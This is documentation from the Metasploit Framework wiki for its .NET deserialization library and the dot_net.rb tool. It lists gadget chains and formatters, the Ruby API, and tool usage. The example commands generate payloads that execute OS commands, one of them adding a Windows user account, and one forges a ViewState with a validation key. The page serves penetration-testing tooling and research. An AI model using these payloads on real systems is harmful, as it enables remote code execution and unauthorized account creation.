docs/metasploit-framework.wiki/Dot-Net-Deserialization.md
Metasploit includes a library for leveraging .NET deserialization attacks. Using
it within a module is very straight forward, the module author just needs to
know two things: the gadget chain and the formatter. The library uses the same
names for each of these values as the [YSoSerial.NET][ysoserial] project for
compatibility, although the Metasploit library only supports a subset of the
functionality.
## Support Matrix
The following table outlines the supported gadget chains, formatters and the
compatibility of each.
| Gadget Chain Name | BinaryFormatter | LosFormatter | SoapFormatter |
| --------------------------- | --------------- | ------------ | ------------- |
| ClaimsPrincipal | Yes | Yes | Yes |
| TextFormattingRunProperties | Yes | Yes | Yes |
| TypeConfuseDelegate | Yes | Yes | No |
| WindowsIdentity | Yes | Yes | Yes |
## Basic Usage
The library is located in `Msf::Util::DotNetDeserialization` and contains the
following methods which are intended for use by module authors.
* `#generate(cmd, gadget_chain:, formatter:)`
This function will generate a serialized payload to execute the specified
operating system command *cmd*. The command is serialized using the
specified *gadget_chain* and formatted with the specified *formatter*. The
*gadget_chain* and *formatter* options will be specific to the vulnerability
that is being executed. This functions returns a string.
* `#generate_formatted(stream, formatter:)`
Format a `SerializedStream` object, as created by `#generate_gadget_chain`.
The *stream* will be formatted using the specified *formatter* and returned
as a string.
* `#generate_gadget_chain(cmd, gadget_chain:)`
Create a gadget chain to run the specified operating system command *cmd*.
This returns a `SerializedStream` object which can be inspected and modified
but must formatted (using `#generate_formatted`) before it is useful.
`#generate` is the primary function and is functionally equivalent to the
following. In the future the `#generate_*` functions may contain additional
options specific to their respective chain or formatter.
```ruby
stream = generate_gadget_chain(cmd, gadget_chain)
formatted = generate_formatted(stream, formatter)
```
### Example Usage
The following example uses the `TextFormattingRunProperties` gadget chain
formatted with the `LosFormatter`.
```ruby
serialized = ::Msf::Util::DotNetDeserialization.generate(
cmd, # this is the Operating System command to run
gadget_chain: :TextFormattingRunProperties,
formatter: :LosFormatter
)
```
## Command Line Tool
The library also has an interface available as a standalone command line tool
which is suitable for creating payloads for single-use research purposes. This
tool `dot_net.rb` is available in the `tools/payloads/ysoserial` directory. The
arguments for this tool are aligned with those of [YSoSerial.NET][ysoserial], allowing
the arguments of basic invocations to be the same. It should be noted however
that the [supported](#support-matrix) gadgets and formatters are not the same.
Help output:
```
Usage: ./dot_net.rb [options]
Generate a .NET deserialization payload that will execute an operating system
command using the specified gadget chain and formatter.
Available formatters:
* BinaryFormatter
* LosFormatter
* SoapFormatter
Available gadget chains:
* ClaimsPrincipal
* DataSet
* DataSetTypeSpoof
* ObjectDataProvider
* TextFormattingRunProperties
* TypeConfuseDelegate
* WindowsIdentity
Available HMAC algorithms: SHA1, HMACSHA256, HMACSHA384, HMACSHA512, MD5
Examples:
./dot_net.rb -c "net user msf msf /ADD" -f BinaryFormatter -g TypeConfuseDelegate -o base64
./dot_net.rb -c "calc.exe" -f LosFormatter -g TextFormattingRunProperties \
--viewstate-validation-key deadbeef --viewstate-validation-algorithm SHA1
General options:
-h, --help Show this message
-c, --command <String> The command to run
-f, --formatter <String> The formatter to use (default: BinaryFormatter)
-g, --gadget <String> The gadget chain to use (default: TextFormattingRunProperties)
-o, --output <String> The output format to use (default: raw, see: --list-output-formats)
--list-output-formats List available output formats, for use with --output
ViewState related options:
--viewstate-generator <String>
The ViewState generator string to use
--viewstate-validation-algorithm <String>
The validation algorithm (default: SHA1, see: Available HMAC algorithms)
--viewstate-validation-key <HexString>
The validationKey from the web.config file
```
The `-g` / `--gadget` option maps to the *gadget_chain* argument for the
generate functions while the `-f` / `--formatter` arguments maps to the
*formatter* argument.
## Making Changes
Adding new gadget chains and formatters involves creating a new file in the
respective library directory: [`lib/msf/util/dot_net_deserialization`][dot-net-deserialization-root]. The
"native" gadget chain type is implemented following the [MS-NRBF] format and
the [Bindata][] records as defined in [`types/`][dot-net-deserialization-types] subdirectory. Once the new
gadget chain or formatter is implemented, it needs to be added to the main
library file ([`dot_net_deserialization.rb`][dot-net-deserialization-rb]).
Since serialization chain generate is deterministic, a [unit test][unit-test] should be
added for any new gadget chain to ensure that the checksum of the
BinaryFormatter representation is consistent.
## Further Reading
Since the .NET deserialization gadgets run operating system commands, the
following resources can be helpful for module developers to deliver native
payloads such as Meterpreter.
* [[How to use command stagers|./how-to-use-command-stagers.md]]
* [[How to use Powershell in an exploit|./how-to-use-powershell-in-an-exploit.md]]
[ysoserial]: https://github.com/pwntester/ysoserial.net
[dot-net-deserialization-root]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization
[MS-NRBF]: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/75b9fe09-be15-475f-85b8-ae7b7558cfe5
[Bindata]: https://github.com/dmendel/bindata
[dot-net-deserialization-types]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization/types
[dot-net-deserialization-rb]: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/dot_net_deserialization.rb
[unit-test]: https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/msf/util/dot_net_deserialization_spec.rb